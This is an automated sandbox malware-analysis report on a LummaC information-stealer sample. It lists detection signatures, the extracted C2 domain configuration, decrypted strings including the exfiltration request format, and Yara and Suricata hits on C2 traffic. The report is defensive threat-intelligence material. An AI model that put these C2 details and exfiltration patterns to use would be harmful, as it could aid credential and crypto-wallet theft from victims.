Edit tour

Windows Analysis Report
H1iOI9vWfh.exe

Overview

General Information

Sample name:	H1iOI9vWfh.exe renamed because original name is a hash value
Original sample name:	482beb4e122303712335daed6df6a4dd.exe
Analysis ID:	1581607
MD5:	482beb4e122303712335daed6df6a4dd
SHA1:	db68b26a43a7e65238d32db338c9c3c343796916
SHA256:	5a86892621cf79383706c55d1d0a17db2982439fc252964a964a42c7b1ffd1a3
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

H1iOI9vWfh.exe (PID: 7024 cmdline: "C:\Users\user\Desktop\H1iOI9vWfh.exe" MD5: 482BEB4E122303712335DAED6DF6A4DD)

WerFault.exe (PID: 5800 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1884 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["screwamusresz.buzz", "prisonyfork.buzz", "rebuildeso.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "inherineau.buzz", "scentniej.buzz", "appliacnesot.buzz"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2615507633.0000000000BCA000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x15a8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000003.2431557756.0000000003060000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: H1iOI9vWfh.exe PID: 7024	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: H1iOI9vWfh.exe PID: 7024	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.H1iOI9vWfh.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.H1iOI9vWfh.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.3.H1iOI9vWfh.exe.b10000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.3.H1iOI9vWfh.exe.b10000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:35.101953+0100	2028371	3	Unknown Traffic	192.168.2.12	49711	23.55.153.106	443	TCP
2024-12-28T09:48:37.558558+0100	2028371	3	Unknown Traffic	192.168.2.12	49712	104.21.66.86	443	TCP
2024-12-28T09:48:39.594125+0100	2028371	3	Unknown Traffic	192.168.2.12	49713	104.21.66.86	443	TCP
2024-12-28T09:48:42.463592+0100	2028371	3	Unknown Traffic	192.168.2.12	49714	104.21.66.86	443	TCP
2024-12-28T09:48:44.887570+0100	2028371	3	Unknown Traffic	192.168.2.12	49716	104.21.66.86	443	TCP
2024-12-28T09:48:47.523499+0100	2028371	3	Unknown Traffic	192.168.2.12	49718	104.21.66.86	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:38.310814+0100	2054653	1	A Network Trojan was detected	192.168.2.12	49712	104.21.66.86	443	TCP
2024-12-28T09:48:40.368182+0100	2054653	1	A Network Trojan was detected	192.168.2.12	49713	104.21.66.86	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:38.310814+0100	2049836	1	A Network Trojan was detected	192.168.2.12	49712	104.21.66.86	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:40.368182+0100	2049812	1	A Network Trojan was detected	192.168.2.12	49713	104.21.66.86	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:33.166899+0100	2058572	1	Domain Observed Used for C2 Detected	192.168.2.12	57509	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:32.269641+0100	2058576	1	Domain Observed Used for C2 Detected	192.168.2.12	52022	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:33.312981+0100	2058578	1	Domain Observed Used for C2 Detected	192.168.2.12	54403	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:32.880819+0100	2058580	1	Domain Observed Used for C2 Detected	192.168.2.12	51301	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:32.439990+0100	2058584	1	Domain Observed Used for C2 Detected	192.168.2.12	63819	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:32.582215+0100	2058586	1	Domain Observed Used for C2 Detected	192.168.2.12	55902	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:32.737635+0100	2058588	1	Domain Observed Used for C2 Detected	192.168.2.12	59941	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:33.023644+0100	2058590	1	Domain Observed Used for C2 Detected	192.168.2.12	56534	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:45.765797+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.12	49716	104.21.66.86	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:48:36.030833+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.12	49711	23.55.153.106	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://lev-tolstoi.com/apij?Vc	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/api1?oc%	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apim	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.H1iOI9vWfh.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["screwamusresz.buzz", "prisonyfork.buzz", "rebuildeso.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "inherineau.buzz", "scentniej.buzz", "appliacnesot.buzz"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for submitted file

Source: H1iOI9vWfh.exe	Virustotal: Detection: 36%			Perma Link
Source: H1iOI9vWfh.exe	ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for sample

Source: H1iOI9vWfh.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.2343688339.0000000000B10000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 4h5VfH--

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Code function: 0_2_00415298 CryptUnprotectData,

0_2_00415298

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Unpacked PE file: 0.2.H1iOI9vWfh.exe.400000.0.unpack

Source: H1iOI9vWfh.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.12:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.12:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.12:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.12:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.12:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.12:49718 version: TLS 1.2

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+eax]	0_2_00415298
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00415298
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h	0_2_0043CB20
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h	0_2_0043CD60
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0040CFF3
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]	0_2_0040CFF3
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp al, 2Eh	0_2_00426054
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then jmp eax	0_2_00426054
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	0_2_0043B05D
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	0_2_0043B05D
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	0_2_0043B068
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	0_2_0043B068
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]	0_2_0040E83B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	0_2_0043B05B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	0_2_0043B05B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_0040A940
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov edx, ecx	0_2_0040A940
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	0_2_0040C917
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then jmp ecx	0_2_0043C1F0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	0_2_00425990
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ecx, di	0_2_00425990
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	0_2_0043B195
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movsx eax, byte ptr [esi]	0_2_0043B9A1
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh	0_2_004369A0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	0_2_0041E9B0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_004299B0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then lea eax, dword ptr [esp+18h]	0_2_0042526A
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ebx, edi	0_2_0041D270
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov esi, eax	0_2_00423A34
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h	0_2_0043D2F0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, word ptr [eax]	0_2_0043D2F0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then jmp ecx	0_2_0043C280
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_0043AAB2
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov word ptr [ebp+00h], 0000h	0_2_004252BA
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	0_2_004252BA
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov eax, ebx	0_2_0041CB05
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov edx, eax	0_2_00427326
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_004143C2
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov edi, dword ptr [esp+34h]	0_2_004143C2
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0042A3D0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_0042C45C
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ebp, dword ptr [eax]	0_2_00436C00
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	0_2_0042B4FC
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_0042B4FC
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, dword ptr [esi+64h]	0_2_00418578
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov edx, eax	0_2_0042750D
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_00421D10
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx]	0_2_0040DD25
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, edx	0_2_0040BDC9
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]	0_2_00417582
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]	0_2_00427DA2
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h	0_2_004205B0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042C64A
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_0042AE48
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then jmp eax	0_2_00426E50
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	0_2_0042B4F7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_0042B4F7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_0042AE24
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00433630
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042C6E4
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	0_2_00425E90
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h	0_2_0043CE90
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_004166A0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0041BEA0
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_0042ADF4
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov eax, edx	0_2_0041C6BB
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then jmp eax	0_2_0043BF40
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]	0_2_00415F66
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch	0_2_00419770
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh	0_2_00419770
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh	0_2_00419770
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h	0_2_00419770
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	0_2_00419770
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h	0_2_00419770
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh	0_2_00419770
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h	0_2_00419770
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	0_2_0043A777
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]	0_2_00409700
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h]	0_2_00409700
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]	0_2_00409700
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042C726
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0042C735
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	0_2_0041DF80
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	0_2_0040D7A2
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	0_2_0040D7A2
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_009DB08B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_009DB0AF
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h	0_2_009ED0F7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	0_2_009D60F7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then jmp eax	0_2_009D70E4
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, edx	0_2_009BC030
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	0_2_009CE1E7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ecx, eax	0_2_009DB05B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	0_2_009EB2CF
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	0_2_009EB2CF
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	0_2_009EB2C4
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	0_2_009EB2C4
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_009BD25A
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]	0_2_009BD25A
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then jmp eax	0_2_009EC268
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp al, 2Eh	0_2_009D63B6
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	0_2_009EB3FC
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	0_2_009EB2C2
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	0_2_009EB2C2
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov ebx, edi	0_2_009CD4D7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then lea eax, dword ptr [esp+18h]	0_2_009D54D1
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then mov word ptr [ebp+00h], 0000h	0_2_009D559D
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	0_2_009D55B3
